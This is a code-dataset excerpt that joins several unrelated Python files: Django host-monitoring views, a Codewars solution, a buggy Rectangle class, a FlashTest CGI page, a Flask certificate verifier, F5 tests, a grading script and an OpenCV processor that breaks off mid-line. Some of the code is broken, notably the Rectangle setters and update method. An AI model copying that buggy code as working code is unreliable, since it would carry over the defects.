res['data']:\n params = {\n 'bk_host_innerip': item['host']['bk_host_innerip'],\n 'bk_host_name': item['host']['bk_host_name'],\n 'bk_os_name': item['host']['bk_os_name'],\n 'bk_inst_name': item['host']['bk_cloud_id'][0]['bk_inst_name'],\n 'bk_cloud_id': item['host']['bk_cloud_id'][0]['id'],\n 'bk_biz_id': item['biz'][0]['bk_biz_id'],\n 'bk_biz_name': item['biz'][0]['bk_biz_name'],\n 'last_user': request.user.username\n }\n host_info, is_exist = HostInfo.objects.update_or_create(**params)\n if is_exist:\n host_info.last_user = request.user.username\n host_info.save()\n\n if bk_host_innerip__in:\n bk_host_innerip__in = bk_host_innerip__in.split(',')\n host_info = HostInfo.objects.filter(bk_host_innerip__in=bk_host_innerip__in, is_delete=False)\n else:\n host_info = HostInfo.objects.filter(is_delete=False)\n for host in host_info:\n result.append(model_to_dict(host))\n\n return render_json({'data': result})\n\n\n@csrf_exempt\ndef list_host(request):\n bk_biz_id = request.GET.get('bk_biz_id')\n client = get_client_by_request(request)\n res = search_host_esb(client, request.user.username, bk_biz_id)\n result = []\n for item in res['data']:\n params = {\n 'bk_host_innerip': item['host']['bk_host_innerip']\n }\n result.append(params)\n return render_json({'data': result})\n\n\n@csrf_exempt\ndef add_host(request):\n params = json.loads(request.body)\n ip = params['ip']\n host_info = HostInfo.objects.filter(bk_host_innerip=ip, is_delete=False)\n if host_info:\n result = u'主机已存在'\n else:\n HostInfo.objects.filter(bk_host_innerip=ip).update(is_delete=False)\n result = u'添加成功'\n return render_json({'data': result})\n\n\n@csrf_exempt\ndef delete_host(request):\n params = json.loads(request.body)\n ip = params['ip']\n HostInfo.objects.filter(bk_host_innerip=ip).update(is_delete=True)\n return render_json({'data': u'删除成功'})\n\n\n@csrf_exempt\ndef display_performance(request):\n def generate_data(pfm_list):\n if not pfm_list:\n return None\n xAxis = []\n series = []\n load5 = []\n\n for host_pfm in pfm_list:\n xAxis.append(host_pfm.check_time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n load5.append(host_pfm.load5)\n series.append({\n 'name': 'load5',\n 'type': 'line',\n 'data': load5\n })\n return {\n \"xAxis\": xAxis,\n \"series\": series,\n \"title\": pfm_list[0].bk_host_innerip.bk_host_innerip\n }\n\n ip = request.GET.get('ip')\n now = datetime.datetime.now()\n load5 = HostLoad5.objects.filter(bk_host_innerip=ip)\n load5_result = generate_data(load5)\n return render_json({'load5': load5_result})\n\n\n@csrf_exempt\ndef get_load5(request):\n host_info_list = HostInfo.objects.filter(is_delete=False)\n\n ip_list = []\n if not host_info_list:\n return\n else:\n username = host_info_list[0].last_user\n bk_biz_id = host_info_list[0].bk_biz_id\n\n for host_info in host_info_list:\n ip_list.append({\n 'ip': host_info.bk_host_innerip,\n 'bk_cloud_id': host_info.bk_cloud_id\n })\n\n client = get_client_by_user(username)\n load5_script = '''#!/bin/bash\ncat /proc/loadavg'''\n\n mem_script = '''#!/bin/bash\nfree –m'''\n\n disk_script = '''#!/bin/bash\ndf –h'''\n\n data = {\n 'ip_list': ip_list,\n 'bk_biz_id': bk_biz_id\n }\n res = fast_execute_script_esb(client, 'admin', data, base64.b64encode(load5_script))\n time.sleep(5)\n if res['data']:\n params = {}\n params.update({'bk_biz_id': data['bk_biz_id'], 'job_instance_id': res['data']['job_instance_id']})\n res = get_job_instance_log_esb(client, 'admin', params)\n\n for i in range(5):\n if res['data'][0]['status'] != 3:\n time.sleep(2)\n res = get_job_instance_log_esb(client, 'admin', params)\n else:\n break\n\n if res['data'][0]['status'] == 3:\n # 处理性能数据\n try:\n pfm_data = res['data'][0]['step_results'][0]['ip_logs']\n except KeyError:\n pfm_data = []\n for item in pfm_data:\n result = item['log_content'].split(' ')\n load5 = result[1]\n mem = result[1]\n disk = result[2]\n cpu = result[3]\n ip = item['ip']\n host_info = HostInfo.objects.get(bk_host_innerip=ip)\n host_pfm = HostLoad5.objects.create(\n bk_host_innerip=host_info,\n check_time=datetime.datetime.now(),\n load5=load5\n )\n now = datetime.datetime.now()\n logger.info(u\"主机{}完成一条性能查询:{}\".format(host_pfm.bk_host_innerip, now))\n\n\nclass CommonUtil(object):\n\n @classmethod\n def pop_useless_params(self, params):\n # 请求参数处理\n pop_keys = []\n for key, value in params.items():\n if value == '':\n pop_keys.append(key)\n if key.endswith('__in'):\n params[key] = str(value).split(',')\n for pop in pop_keys:\n params.pop(pop)\n return params\n","repo_name":"owenlinmz/saas-practice-2nd","sub_path":"home_application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42126079158","text":"'''\nhttps://www.codewars.com/kata/5828713ed04efde70e000346/train/python\n\nYou will be given an array of objects (associative arrays in PHP) representing \ndata about developers who have signed up to attend the next coding meetup that you are organising.\n\nYour task is to return an object (associative array in PHP) which includes the count of each \ncoding language represented at the meetup.\n\n'''\n# from collections import Counter\n# def count_languages(lst): \n# return Counter(dev[\"language\"] for dev in lst)\n \ndef count_languages(lst):\n # count = {}\n # for dev in lst:\n # l = dev[\"language\"]\n # if l in count: \n # count[l] += 1\n # else:\n # count[l] = 1\n # return count\n\n language = [dev[\"language\"] for dev in lst]\n return {i: language.count(i) for i in language}\n\n\nlist1 = [\n { 'firstName': 'Noah', 'lastName': 'M.', 'country': 'Switzerland', 'continent': 'Europe', 'age': 19, 'language': 'C' },\n { 'firstName': 'Anna', 'lastName': 'R.', 'country': 'Liechtenstein', 'continent': 'Europe', 'age': 52, 'language': 'JavaScript' },\n { 'firstName': 'Ramon', 'lastName': 'R.', 'country': 'Paraguay', 'continent': 'Americas', 'age': 29, 'language': 'Ruby' },\n { 'firstName': 'George', 'lastName': 'B.', 'country': 'England', 'continent': 'Europe', 'age': 81, 'language': 'C' },\n]\n\nprint(count_languages(list1))","repo_name":"davemolk/python_practice","sub_path":"7kyu_coding_meetup5.py","file_name":"7kyu_coding_meetup5.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16135565939","text":"#!/usr/bin/python3\n\"\"\"Module for our rectangle class\"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\"Representing a rectangle class\"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\"initializing the rectangle\"\"\"\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n @property\n def width(self):\n \"\"\"retrieving width of the rectangle\"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\"setting the value of the width\"\"\"\n if (type(value) is not int):\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value\n\n @property\n def height(self):\n \"\"\"retrieving height of the rectangle\"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\"setting the value of the height\"\"\"\n if (type(value) is not int):\n raise TypeError(\"height must be an integer\")\n if value <= 0:\n raise ValueError(\"height must be > 0\")\n self.__height = value\n\n @property\n def x(self):\n \"\"\"retrieving x of the rectangle\"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"setting the value of the x\"\"\"\n if (type(value) is not int):\n raise TypeError(\"x must be an integer\")\n if value < 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = value\n\n @property\n def y(self):\n \"\"\"retrieving y of the rectangle\"\"\"\n return self.__y\n\n @width.setter\n def y(self, value):\n \"\"\"setting the value of the y\"\"\"\n if (type(value) is not int):\n raise TypeError(\"y must be an integer\")\n if value < 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = value\n\n def area(self):\n \"\"\"retrieving the area of the rectangle\"\"\"\n return (self.__width * self.__height)\n\n def display(self):\n \"\"\"Displays the rectangle using #\"\"\"\n for y in range(self.y):\n print(\"\")\n for i in range(self.__height):\n for x in range(self.x):\n print(\" \", end=\"\")\n for j in range(self.__width):\n print(\"#\", end=\"\")\n print()\n\n def __str__(self):\n \"\"\"format for the string representation of the class\"\"\"\n return \"[{}] ({}) {}/{} - {}/{}\".\\\n format(\"Rectangle\", self.id, self.__x, self.__y, self.__width, self.__height)\n\n def update(self, *args, **kwargs):\n \"\"\"updates instance attributes\"\"\"\n if args and len(args) != 0:\n x = 0\n for i in args:\n if x == 0:\n if i is None:\n self.__init__(self.width, self.height, self.x, self.y)\n else:\n self.id = i\n elif x == 1:\n self.width = i\n elif x == 2:\n self.height = i\n elif x == 3:\n self.x = i\n elif x == 4:\n self.y = i\n a += 1\n\n elif kwargs and len(kwargs) != 0:\n for a, b in kwargs.items():\n if a == \"id\":\n if b is None:\n self.__init__(self.width, self.height, self.x, self.y)\n else:\n self.id = b\n elif a == width:\n self.width = b\n elif a == height:\n self.height = b\n elif a == \"x\":\n self.x = b\n elif a == \"y\":\n self.y = b\n\n def to_dictionary(self):\n \"\"\"Returns dictionary representation of the class\"\"\"\n return {\"id\": self.id, \"width\": self.__width, \"height\": self.__height, \"x\": self.__x, \"y\": self.__y}\n","repo_name":"Its-Ajua/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15113357872","text":"#!/usr/bin/env python3\nimport sys, os\nimport cgi, pickle, tempfile\nimport purgeTmp\nsys.path.insert(0, os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), \"lib\"))\nimport invocations, littleParser\n\nfileMap = \"fileMap\"\n\ndef abort(msg):\n print(\"\")\n print(msg)\n print(\"\")\n print(\"\")\n sys.exit(0)\n\ndef rewriteFileMap(fileMapDict):\n # rewrite \"fileMap\" with new additions/deletions\n text = \"# THIS IS A COMPUTER GENERATED FILE! DO NOT EDIT!\\n\"\n text += \"\\n\".join([\"%s: %s\" % (key, fileMapDict[key]) for key in list(fileMapDict.keys())])\n open(fileMap,\"w\").write(text)\n\n# FlashTest's main results board showing red or green lights\n# for FlashTest invocations with failures or no failures.\n\n# first purge all files over 24 hours old from \"tmp\"\npurgeTmp.purgeTmp()\n\nprint(\"Content-type: text/html\\n\")\nprint(\"\")\nprint(\"Flash-X A Multiphysics Multidomain Software \")\n\n# next three lines ensure browsers don't cache, as caching can cause false\n# appearances of the \"please wait while the table is being regenerated\" if\n# the user uses the browser's \"back\" button.\nprint(\"\")\nprint(\"\")\nprint(\"\")\n\nprint(open(f'{os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), \"style.css\")}',\"r\").read())\nprint(\"\")\nprint(\"\")\nprint(\"\")\nprint(\"\")\n\n# make sure website has write permissions in this folder\ncwd = os.getcwd()\nif not os.access(cwd, os.W_OK):\n msg = (\"The web-server does not have write permissions in directory \\\"%s\\\"
    \" % cwd +\n \"This permission must be granted for FlashTestView to function correctly.\")\n abort(msg)\n\n# Generate fileMapDict from \"fileMap\", a text file that maps\n# paths to output directories to their associated \".pick\" files.\nif os.path.isfile(fileMap):\n # Paul, uncomment the lines below and delete this line when you've fixed the file permissions\n if not os.access(fileMap, os.R_OK + os.W_OK):\n msg = (\"The web-server does not have read and/or write permissions on file \\\"%s\\\"
    \" % os.path.join(cwd, fileMap) +\n \"This permission must be granted for FlashTestView to function correctly.\")\n abort(msg)\n else:\n fileMapDict = littleParser.parseFile(fileMap)\nelse:\n fileMapDict = {}\n\nif os.path.isfile(\"config\"):\n configDict = littleParser.parseFile(\"config\")\n pathsToOutdirs = configDict.get(\"pathToOutdir\", []) # returns a string if only one value\n # associated with key, else a list\n\n # Make 'pathToOutdir' into a list if it's not one already.\n # If the list has more than one element, we'll eventually\n # use it to make the drop-down menu that lets the user\n # visualize different collections of FlashTest data\n if not isinstance(pathsToOutdirs, list):\n pathsToOutdirs = [pathsToOutdirs]\n\n # delete any .pick files whose corresponding path\n # no longer appears in 'configDict' and eliminate\n # the appropriate entry in 'fileMapDict'\n fileMapNeedsRewrite = False\n for key in list(fileMapDict.keys())[:]:\n if key not in pathsToOutdirs:\n try:\n os.remove(fileMapDict[key])\n except:\n pass\n del fileMapDict[key]\n fileMapNeedsRewrite = True\n\n if fileMapNeedsRewrite:\n rewriteFileMap(fileMapDict)\n\nelse:\n configDict = {}\n pathsToOutdirs = []\n\npickFile = \"\"\nform = cgi.FieldStorage()\npathToTargetDir = form.getvalue(\"target_dir\")\nthisPageNum = form.getvalue(\"page\")\n\nif pathToTargetDir:\n if configDict:\n if pathToTargetDir in pathsToOutdirs:\n if not os.path.isdir(pathToTargetDir):\n if pathToTargetDir in fileMapDict:\n del fileMapDict[pathToTargetDir]\n rewriteFileMap(fileMapDict)\n abort(\"\\\"%s\\\" does not exist or is not a directory.\" % pathToTargetDir)\n else:\n abort(\"Directory \\\"%s\\\" not listed as a value for key \\\"pathToOutdir\\\" in \\\"config\\\".
    \" % pathToTargetDir +\n \"Add this directory to \\\"config\\\" and reload this page.\")\n else:\n abort(\"File \\\"config\\\" either does not exist or does not contain any values.
    \"+\n \"Create a \\\"config\\\" file if necessary and add the following text:

    \" +\n \"pathToOutdir: %s

    \" % pathToTargetDir +\n \"Then reload this page.\")\nelse:\n if configDict:\n if pathsToOutdirs:\n pathToTargetDir = pathsToOutdirs[0]\n if not os.path.isdir(pathToTargetDir):\n if pathToTargetDir in fileMapDict:\n del fileMapDict[pathToTargetDir]\n rewriteFileMap(fileMapDict)\n abort(\"\\\"%s\\\" as listed in \\\"config\\\"
    \" % pathToTargetDir +\n \"does not exist or is not a directory.\")\n else:\n abort(\"You must add at least one value to the key \\\"pathToOutdir\\\" in \\\"config\\\"
    \" +\n \"where that value is a path to a top-level FlashTest output directory.\")\n else:\n abort(\"File \\\"config\\\" either does not exist or does not contain any values.
    \" +\n \"Create a \\\"config\\\" file if necessary and add the following text:

    \" +\n \"pathToOutdir: [path/to/outdir]

    \" +\n \"where [path/to/outdir] is an absolute path to a top-level FlashTest output directory.
    \" +\n \"Then reload this page.\")\n\n\n# At this point we know that 'pathToTargetDir' is defined, that it is\n# an extant directory, and that that directory is listed in \"config\"\n\nif pathToTargetDir in fileMapDict:\n pickFile = fileMapDict[pathToTargetDir]\n bigBoard = pickle.load(open(pickFile, 'rb'))\n if bigBoard.isOutOfDate():\n print(\"\")\n print(\"
    \")\n print(\"FlashTest has generated new data since the last time this page was viewed.
    \")\n print(\"Please wait while the table is being regenerated.\")\n print(\"
    \")\n sys.stdout.flush()\n bigBoard.quickRegenerate()\n pickle.dump(bigBoard, open(pickFile, \"w\"))\n else:\n print(\"\")\nelse:\n print(\"\")\n print(\"
    \")\n print(\"Please wait while FlashTestView generates a table for \\\"%s\\\".\" % pathToTargetDir)\n print(\"
    \")\n sys.stdout.flush()\n bigBoard = invocations.BigBoard(pathToTargetDir)\n newFile, newFileName = tempfile.mkstemp(suffix=\".pick\", prefix=\"\", dir=os.getcwd())\n os.chmod(newFileName, 256 + 32 + 4 + 128 + 16) # make 'newFile' readable by all,\n # writeable by owner and group\n pickle.dump(bigBoard, os.fdopen(newFile, \"wb\"))\n fileMapDict[pathToTargetDir] = newFileName\n rewriteFileMap(fileMapDict)\n\n# At this point, 'bigBoard' exists, and is updated.\n\n# floating div which will be populated with the stats\n# from one invocation when user hovers over a datestamp\nprint(\"
    \")\nprint(\"
    \")\nprint(\"
    \")\nprint(\"
    \")\n\n# start main page\nprint(\"
    \")\nprint(\"FlashTest HOW-TO\")\nprint(\"
    \")\nprint(\"
     
    \")\nprint(\"
    \")\nprint(\"

    FlashTest Invocations

    \")\nprint(\"
    \")\n\n# make bar with navigation to other \"pages\" of results.\ninvocationsPerPage = int(configDict.get(\"invocationsPerPage\", 50))\n\nnumRows = bigBoard.numRows\n\nif numRows > invocationsPerPage:\n lastPageNum = ((numRows-1) / invocationsPerPage) + 1\n try:\n thisPageNum = int(thisPageNum)\n except:\n # No page number in query-string, so 'thisPageNum' was None.\n # Either that or some joker entered a non-numerical value in URL bar.\n thisPageNum = lastPageNum\n else:\n if thisPageNum < 1:\n # some joker entered '0', probably\n thisPageNum = 1\n elif thisPageNum > lastPageNum:\n # some joker entered something too high\n thisPageNum = lastPageNum\n\n # This is tricky because the *smaller* the value of 'thisPageNum',\n # the further we reach back in time, and the *greater* the indices\n # of the invocations we need to examine. Therefore, to help with the\n # arithmetic, we create 'reversedPageNum', whose value gets higher\n # with the indices (but not the dates) of the invocations.\n reversedPageNum = (lastPageNum + 1) - thisPageNum\n\n print(\"
     
    \")\n print(\"
    \")\n if thisPageNum > 1:\n # print a \"<<\" (previous page link)\n endRow = bigBoard.getInvocationName(reversedPageNum*invocationsPerPage)\n startRow = bigBoard.getInvocationName(((reversedPageNum+1)*invocationsPerPage)-1)\n print((\"<<\" % (startRow, endRow)))\n else:\n # print a \"dummy link\"\n print(\"<<\")\n\n for i in range(1, lastPageNum + 1):\n if i == thisPageNum:\n print(\"%s\" % i) # not a link, since we're already on this page\n else:\n # see comment regarding 'reversedPageNum' above\n reversedI = (lastPageNum + 1) - i\n endRow = bigBoard.getInvocationName((reversedI-1)*invocationsPerPage)\n startRow = bigBoard.getInvocationName((reversedI*invocationsPerPage)-1)\n print((\"%s\" % (startRow, endRow, i)))\n\n if thisPageNum < lastPageNum:\n # print a \">>\" (next page link)\n endRow = bigBoard.getInvocationName((reversedPageNum-2)*invocationsPerPage)\n startRow = bigBoard.getInvocationName(((reversedPageNum-1)*invocationsPerPage)-1)\n print((\">>\" % (startRow, endRow)))\n else:\n # print a \"dummy link\"\n print(\">>\")\n\n print(\"
    \")\n\n startRow = (reversedPageNum - 1) * invocationsPerPage\n endRow = min((startRow + invocationsPerPage - 1), numRows-1)\nelse:\n startRow = 0\n endRow = numRows-1\n\n# generate drop-down menu for easy switching between\n# FlashTest output directories if more than 1 available.\nif len(pathsToOutdirs) > 1:\n print(\"
    \")\n print(\"\")\n print(\"
    \")\n\nprint(\"
     
    \")\n\nbigBoard.spewHtml(sys.stdout, startRow, endRow)\n\nprint(\"\")\nprint(\"\")\n","repo_name":"Flash-X/Flash-X-Test","sub_path":"FlashXTest/backend/Webview/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42697860655","text":"from flask import Flask, request\nfrom OpenSSL import crypto\nimport re\n\napp = Flask(__name__)\n\ndef verify_certificate_chain(cert_data, trusted_data):\n '''\n This function verifies if a given certificate traces to the root certificate in the chain of trust.\n Args:\n cert_data: Certificate data to be verified\n trusted_data: Trusted certificate data\n Return: bool based on verification\n '''\n certificate = crypto.load_certificate(crypto.FILETYPE_PEM, cert_data)\n\n # To extract all the certificates in the chain of trust via the regex\n list_trust = re.findall(\"(-----BEGIN CERTIFICATE-----(.|\\n)+?(?=-----END CERTIFICATE-----)+)\", trusted_data)\n\n #Creating a certificate store and adding all the trusted certificates from the chain\n \n try:\n store = crypto.X509Store()\n\n for _cert in list_trust:\n # appending the footer to the certificate as that was not captured via the regex\n cert = _cert[0] + \"-----END CERTIFICATE-----\"\n client_certificate = crypto.load_certificate(crypto.FILETYPE_PEM, cert)\n store.add_cert(client_certificate)\n \n # Create a certificate context using the store and the loaded certificate\n store_ctx = crypto.X509StoreContext(store, certificate)\n \n # To verify the certificate\n # Returns None if the certificate can be validated\n store_ctx.verify_certificate()\n return True\n\n except Exception as e:\n print(\"Reason: \" + str(e).title())\n return False\n\n@app.route('/verify-certificate', methods=['POST'])\ndef verify_certificate():\n cert_data = request.form['certificate']\n trusted_data = request.form['trusted']\n if verify_certificate_chain(cert_data, trusted_data):\n return \"True\"\n else:\n return \"False\"\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"PoVA-Consensus/Proof-Of-Concept","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22107153430","text":"from collections import namedtuple\nPoolConfig = namedtuple('PoolConfig', 'partition name memberconfigs')\nMemberConfig = namedtuple('MemberConfig', 'mempartition memname')\n\n\ndef test_get_collection(request, bigip, pool_factory):\n Pool1MemberConfigs = (MemberConfig('Common', '192.168.15.15:80'),\n MemberConfig('Common', '192.168.16.16:8080'),)\n Pool1Config = PoolConfig('Common', 'TEST', Pool1MemberConfigs)\n test_pools = (Pool1Config,)\n pool_registry, member_registry =\\\n pool_factory(bigip, request, test_pools)\n selfLinks = []\n for pool_inst in pool_registry.values():\n for mem in pool_inst.members_s.get_collection():\n selfLinks.append(mem.selfLink)\n assert selfLinks[0] == u'https://localhost/mgmt/tm/ltm/pool/' +\\\n '~Common~TEST/members/~Common~192.168.15.15:80' +\\\n '?ver=11.6.0'\n assert selfLinks[1] == u'https://localhost/mgmt/tm/ltm/pool/' +\\\n '~Common~TEST/members/~Common~192.168.16.16:8080' +\\\n '?ver=11.6.0'\n\n\ndef test_get_dollar_filtered_collection(request, bigip, pool_factory):\n hostname = bigip._meta_data['hostname']\n if bigip.sys.folders.folder.exists(name='za', partition=''):\n bigip.sys.folders.folder.load(name='za', partition='')\n else:\n bigip.sys.folders.folder.create(name='za', partition='/')\n Pool1Config = PoolConfig('Common', 'TEST', ((),))\n Pool2Config = PoolConfig('za', 'TEST', ((),))\n test_pools = (Pool1Config, Pool2Config)\n pool_registry, member_registry =\\\n pool_factory(bigip, request, test_pools)\n rp = {'params': {'$filter': 'partition eq za'}}\n pools_in_za = bigip.ltm.pools.get_collection(requests_params=rp)\n muri = pools_in_za[0]._meta_data['uri']\n assert muri == 'https://'+hostname+'/mgmt/tm/ltm/pool/~za~TEST/'\n","repo_name":"yuanfm/f5-common-python","sub_path":"test/functional/test_requests_params.py","file_name":"test_requests_params.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30850861103","text":"class Course():\n def __init__(self,name,credits,policy,weights):\n self.name = name\n self.credits = credits\n self.policy = policy\n self.weights = weights\n self.final_cutoffs = policy\n self.students = []\n self.marks = []\n self.grades=[]\n self.stu_grades = {}\n\n def final_cutoff(self):\n marks_ = [[] for i in self.policy]\n for m in self.marks:\n if self.policy[0]-2 <=m<= self.policy[0]+2:\n marks_[0].append(m)\n elif self.policy[1]-2 <=m<= self.policy[1]+2:\n marks_[1].append(m)\n elif self.policy[2]-2 <=m<= self.policy[2]+2:\n marks_[2].append(m)\n elif self.policy[3]-2 <=m<= self.policy[3]+2:\n marks_[3].append(m)\n\n for j in range(len(marks_)):\n l = marks_[j]\n l.sort()\n a = 0\n diff = 0\n b = 0\n for i in range(1,len(l)-1):\n d = l[i] - l[i-1]\n if d > diff:\n diff = d\n a = l[i-1]\n b = l[i]\n self.final_cutoffs[j] = (self.policy[j] + (a+b/2))\n\n def find_marks(self):\n for stu in self.students:\n marks = stu.get_marks()\n sum_ = sum(marks)\n self.marks.append(sum_)\n\n def find_grades(self):\n\n for mark in self.marks:\n if mark >= self.final_cutoffs[0]:\n self.grades.append('A')\n\n elif mark >= self.final_cutoffs[1]:\n self.grades.append('B')\n\n elif mark >= self.final_cutoffs[2]:\n self.grades.append('C')\n \n elif mark >= self.final_cutoffs[3]:\n self.grades.append(\"D\")\n else:\n self.grades.append(\"F\")\n\n def add_student(self,s):\n self.students.append(s)\n\n def get_marks(self):\n return self.marks\n\n def get_cutoffs(self):\n return self.final_cutoffs\n \n def get_grades(self):\n return self.grades\n\n def find_student_grades(self):\n for i in range(len(self.students)):\n stu = self.students[i]\n self.stu_grades[stu.get_rollno()] = self.grades[i]\n\n def summary(self):\n return self.stu_grades\n\n def get_marks(self):\n return self.marks\n\n def get_mark_weightage(self,rollno):\n for i in self.students:\n if i.get_rollno() == rollno:\n return i.get_marks()\n\n def get_grade(self,rollno):\n if rollno in self.stu_grades:\n return self.stu_grades[rollno]\n\n def get_summary(self):\n print(f\"\"\"\n\n \nCourse name: {self.name}\n\nInitial cutoffs: \n {self.policy}\n\nFinal Cutoffs: \n {self.final_cutoffs}\n\nStudent Grades: \n {self.stu_grades}\n\nWeights:\n {self.weights}\n\"\"\")\n\nclass Student():\n def __init__(self,marks,rollno):\n self.marks = marks\n self.rollno = rollno\n\n def get_marks(self):\n return self.marks\n\n def get_rollno(self):\n return self.rollno\n\n \n\n\n\nf = open(\"students_marks.txt\",\"r\")\nf1 = open(\"students_grades_4.txt\",\"w\")\nstudents = f.read().splitlines()\ncourse = Course(\"IP\",4,[80, 65, 50, 40], [(\"labs\", 30), (\"midsem\", 15), (\"assignments\", 30), (\"endsem\", 25)])\nfor line in students:\n line = line.split(\", \")\n rollno = int(line[0])\n marks = list(map(int,line[1:]))\n st = Student(marks,rollno)\n\n course.add_student(st)\n\ncourse.find_marks()\ncourse.final_cutoff()\ncourse.find_grades()\ncourse.find_student_grades()\n\nd = course.summary()\nmarks = course.get_marks()\ncount = 0\nwhile True:\n\n c = int(input(\"Enter choice: \"))\n if c == 1:\n course.get_summary()\n\n elif c == 2:\n for i in d:\n s = f\"{i}: Marks: {marks[count]} Grade: {d[i]}\\n\"\n count+=1\n f1.write(s)\n\n elif c == 3:\n n = int(input(\"Enter a roll no:\"))\n m = course.get_mark_weightage(n)\n if m == None:\n print(\"No such record!\")\n continue\n s = f\"{n}: Marks: {sum(m)} Weightage: {m} Grade: {d[i]}\\n\"\n print(s)\n\n elif c == 4:\n f1.close()\n f.close()\n break","repo_name":"noeltiju/Semester-1","sub_path":"Assignment3/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16918277936","text":"# import pixellib\n# from pixellib.instance import instance_segmentation\n\n# segment_image=instance_segmentation()\n# segment_image.load_model(\"mask_rcnn_coco.h5\")\n# segment_image.segmentImage(\"5a/ST05_SE010107.jpg\", \n# extract_segmented_objects=True,\n# save_extracted_objects=True, \n# show_bboxes=True,\n# output_image_name=\"output.jpg\"\n# )\n\nimport cv2\nimport numpy as np\nimport os\nimport random\nimport shutil\n\nclass Processor:\n # lower_bound = np.array([180,180,180]) # really nice on orange\n satval = 1\n contval = (3, 8)\n thresh = 210\n pad = 50\n limit = 20\n\n def rand_image(self, dir):\n return self.read_file(dir+\"/\"+random.choice(os.listdir(dir)))\n\n # experiment 2\n def to_grayscale(self, img):\n return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n def threshold(self, img):\n # blur the image to smmooth out the edges a bit, also reduces a bit of noise\n blurred = cv2.GaussianBlur(img, (5, 5), 0)\n # convert the image to grayscale \n gray = cv2.cvtColor(blurred, cv2.COLOR_BGR2GRAY)\n # apply thresholding to conver the image to binary format\n # after this operation all the pixels below 200 value will be 0\n _, gray = cv2.threshold(gray, self.thresh , 255, cv2.CHAIN_APPROX_NONE)\n return gray\n\n def create_contour_mask(self, img, contour):\n # create a black `mask` the same size as the original grayscale image \n mask = np.zeros_like(img)\n # fill the new mask with the shape of the largest contour\n # all the pixels inside that area will be white \n cv2.fillPoly(mask, [contour], 255)\n\n # create a copy of the current mask\n res_mask = np.copy(mask)\n res_mask[mask == 0] = cv2.GC_BGD # obvious background pixels\n res_mask[mask == 255] = cv2.GC_PR_BGD # probable background pixels\n res_mask[mask == 255] = cv2.GC_FGD # obvious foreground pixels\n\n # create a mask for obvious and probable foreground pixels\n # all the obvious foreground pixels will be white and...\n # ... all the probable foreground pixels will be black\n mask2 = np.where(\n (res_mask == cv2.GC_FGD) | (res_mask == cv2.GC_PR_FGD),\n 255,\n 0\n ).astype('uint8')\n\n # create `new_mask3d` from `mask2` but with 3 dimensions instead of 2\n new_mask3d = np.repeat(mask2[:, :, np.newaxis], 3, axis=2)\n mask3d = new_mask3d\n mask3d[new_mask3d > 0] = 255.0\n mask3d[mask3d > 255] = 255.0\n # apply Gaussian blurring to smoothen out the edges a bit\n # `mask3d` is the final foreground mask (not extracted foreground image)\n return cv2.GaussianBlur(mask3d, (5, 5), 0), mask2\n\n def apply_contour_mask(self, img, mask):\n # create the foreground image by zeroing out the pixels where `mask2`...\n # ... has black pixels\n foreground = np.copy(img).astype(float)\n foreground[mask == 0] = 255\n return foreground.astype(np.uint8)\n\n def find_largest_contour(self, image):\n \"\"\"\n This function finds all the contours in an image and return the largest\n contour area.\n :param image: a binary image\n \"\"\"\n image = image.astype(np.uint8)\n contours, hierarchy = cv2.findContours(\n image,\n cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE\n )\n largest_contour = max(contours, key=cv2.contourArea)\n return largest_contour\n \n def process_dir(self, dir):\n out = dir+\"_out\"\n if os.path.exists(out):\n shutil.rmtree(out)\n os.makedirs(out)\n\n i = 0\n for file in os.listdir(dir):\n if file.endswith(\".jpg\"):\n self.process_image(dir+\"/\"+file, out+\"/\"+file)\n i += 1\n if self.limit > 0 and i > self.limit:\n break\n\n def process_image(self, file, output):\n img = self.read_file(file)\n contrast = self.contrast(img, self.contval)\n sat = self.saturate(contrast, self.satval)\n gray = self.threshold(sat)\n contour = self.find_largest_contour(gray)\n if contour is not None:\n mask3d, mask2 = self.create_contour_mask(gray, contour)\n foreground = self.apply_contour_mask(img, mask2)\n bbox = self.bbox_contour(contour)\n if bbox is not None:\n cropped = self.crop(foreground, bbox)\n if cropped.size == 0:\n print(\"image empty\")\n else:\n self.write_file(cv2.cvtColor(cropped, cv2.COLOR_RGB2BGR), output)\n else:\n print(\"bbox too small\")\n else:\n print(\"skipping.\")\n \n def read_file(self, file):\n img = cv2.imread(file)\n return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n def write_file(self, img, file):\n return cv2.imwrite(file, 